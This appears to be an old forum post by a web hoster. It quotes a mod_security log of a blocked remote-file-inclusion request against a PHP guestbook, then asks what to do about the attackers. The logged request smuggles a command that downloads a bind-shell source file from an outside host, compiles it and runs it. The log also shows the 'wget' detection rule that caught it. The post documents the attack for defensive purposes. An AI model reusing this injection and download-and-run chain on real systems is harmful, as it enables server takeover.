So you stopped hackers at work, what next?
HTTP/1.1
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1
========================================
Request: 193.95.229.34 - - [29/Sep/2004:15:10:36 +0200] "GET /guestbook/include/livre_include.php?no_connect=lol&chem_absolu=http://*******/jmascare/cmd.txt?&cmd=cd%20/usr/tmp;wget%20http://www.*********.org/archives/konewka/mybindshell.c;gcc%20mybindshell.c%20-o%20bind;./bind HTTP/1.1" 500 0
Handler: server-parsed
Error: File does not exist: /home/******/public_html/500.shtml
----------------------------------------
GET /guestbook/include/livre_include.php?no_connect=lol&chem_absolu=http://*******/jmascare/cmd.txt?&cmd=cd%20/usr/tmp;wget%20http://www.********.org/archives/konewka/mybindshell.c;gcc%20mybindshell.c%20-o%20bind;./bind HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Accept-Encoding: gzip, deflate
Accept-Language: en-us
Connection: Keep-Alive
Host: www.********
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FunWebProducts-MyWay; .NET CLR 1.1.4322)
mod_security-message: Access denied with code 500. Pattern match "wget\x20" at THE_REQUEST.
mod_security-action: 500
So I blinded some adresses but when I lookup those adresses I find some 'interresting' programmes/scripts and txts wich shows for example some involvement in a socalled legal security site.
I could show those adresses here but I don't think that is wisely. What I want to know is what you guys do in cases of this. Just block the ip's and that's it? Send the adressess to the FBI or something like that? Till now we really did nothing but to learn from these attacks. We have had it with these ********! We want to share info like this with others. Where is the right place to do this?
Hosters unite I would say...
Thanks!
